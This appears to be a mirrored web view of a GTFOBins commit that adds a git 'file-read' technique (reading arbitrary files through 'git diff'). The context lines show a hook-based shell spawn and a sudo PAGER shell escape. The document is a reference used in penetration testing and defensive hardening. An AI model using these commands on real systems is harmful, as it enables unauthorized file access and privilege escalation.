mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2024-11-08 07:49:17 +01:00
Add file read to git
This commit is contained in:
parent
81fafc83f3
commit
1a5b396744
@ -13,6 +13,11 @@ functions:
|
||||
echo 'exec /bin/sh 0<&2 1>&2' >"$TF/.git/hooks/pre-commit.sample"
|
||||
mv "$TF/.git/hooks/pre-commit.sample" "$TF/.git/hooks/pre-commit"
|
||||
git -C "$TF" commit --allow-empty -m x
|
||||
file-read:
|
||||
- description: The read file content is displayed in `diff` style output format.
|
||||
code: |
|
||||
LFILE=file_to_read
|
||||
git diff /dev/null $LFILE
|
||||
sudo:
|
||||
- code: sudo PAGER='sh -c "exec sh 0<&1"' git -p help
|
||||
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
|
||||
|
Loading…
Reference in New Issue
Block a user